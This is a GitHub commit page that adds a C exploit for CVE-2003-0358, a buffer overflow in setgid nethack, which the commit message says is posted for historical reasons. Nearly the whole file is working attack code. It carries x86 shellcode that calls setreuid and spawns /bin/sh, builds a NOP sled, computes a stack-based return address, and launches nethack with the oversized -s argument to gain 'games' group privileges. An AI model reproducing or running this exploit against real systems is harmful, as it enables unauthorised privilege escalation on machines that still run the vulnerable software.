Add CVE-2003-0358.c

Old exploit from my script kiddie days. I am posting for historical reasons.
fengjixuchui · Nov 27, 2022 · b8bf686 · b8bf686
1 parent 6046eaf
commit b8bf686
Showing 1 changed file with 51 additions and 0 deletions.
diff --git a/CVE-2003-0358.c b/CVE-2003-0358.c
@@ -0,0 +1,51 @@
+/*
+        By passing an overly large string when invoking nethack, it is possible to corrupt memory.
+        By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.
+        slashem, jnethack and falconseye are also prone to this vulnerability.
+*/
+
+/*
+        snowcrash: CVE-2003-0358
+
+        tsao@efnet #!IC@efnet 2k3
+        thnx to aleph1 for execve shellcode &
+        davidicke for setreuid() shellcode
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+
+char code[] =
+
+"\x29\xc4\x31\xc0\x31\xc9\x31\xdb\xb3\x0c\x89\xd9\xb0\x46\xcd\x80"
+"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+"\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+
+
+unsigned long sp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+int main(int argc, char **argv) {
+     char *p;
+     int i, off;
+
+     p = malloc(sizeof(char) * atoi(argv[1]));
+     memset(p,0x90,atoi(argv[1]));
+
+     off = 220 - strlen(code);
+     printf("shellcode at %d->%d\n",off,off+strlen(code));
+     for(i=0;i<atoi(argv[1]);i++)
+       p[i+off] = code[i];
+
+
+     *(long *) &p[220] = sp() - atoi(argv[2]);
+     printf("Using %x\n",sp() - atoi(argv[2]));
+
+     execl("/usr/games/lib/nethackdir/nethack","nethack","-s",p,0);
+     perror("wtf");
+}